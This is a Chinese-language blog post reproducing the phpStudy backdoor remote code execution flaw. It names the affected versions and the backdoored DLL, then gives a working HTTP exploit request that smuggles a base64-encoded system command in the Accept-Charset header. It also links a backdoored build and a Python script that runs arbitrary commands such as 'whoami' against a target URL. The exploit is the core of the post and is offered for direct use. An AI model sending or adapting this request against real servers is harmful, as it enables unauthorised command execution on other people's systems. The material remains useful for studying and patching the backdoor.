phpStudy后门RCE复现

1C 2019-10-11 PM 1138℃ 0条

phpStudy后门RCE复现

0x00 影响版本
phpstudy 2016版PHP5.4存在后门。
phpstudy2018版php-5.2.17和php-5.4.45也同样存在后门
点击下载后门版

0x01 后门文件
后门文件路径：phpStudyPHPTutorialphpphp-5.4.45extphp_xmlrpc.dll

编辑器打开php_xmlrpc.dll文件搜索“@eval”字样判断有无后门

0x02 复现
EXP如下：

POST /index.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding:gzip,deflate
Accept-Charset:c3lzdGVtKCJjYWxjIik7 此处填写的是要执行的命令base64加密

Accept-Encoding和Accept-Charset这两个必须要有

附上python验证脚本点击我下载
使用格式：python phpstudy.py whoami http://xxxx.com/

标签: PhpStudy

非特殊说明，本博所有文章均为博主原创。

如若转载，请注明出处：https://www.bugku.net/archives/76.html

上一篇 CVE-2019-0708漏洞复现

下一篇 Apache Solr Velocity模板远程代码执行复现

评论啦~

2020年8月7号，好长时间没动态了，冒个泡(●'◡'●)2020年08月07日 23:07:45
2019年9月13号，大家中秋节快乐(*^▽^*)2019年09月13日 08:10:04

技术分享 CVE-2017-7921 Metasploit-msf Hikvision SSV-98101 PhpStudy Apache Flink typecho 工具 Python 渗透 Solr Nmap CVE-2019-0708 cs Cobalt Strike js CVE-2019-17558

宁采陈的博客 IT老五陈小黑博客 Bzero's Blog 这个站有点库

phpStudy后门RCE复现

phpStudy后门RCE复现

评论啦~

栏目分类

博主动态 ~

标签云

友情链接申请

phpStudy后门RCE复现

phpStudy后门RCE复现

 评论啦~

 栏目分类

博主动态 ~

标签云

友情链接申请

评论啦~

栏目分类

博主动态 ~

标签云

友情链接申请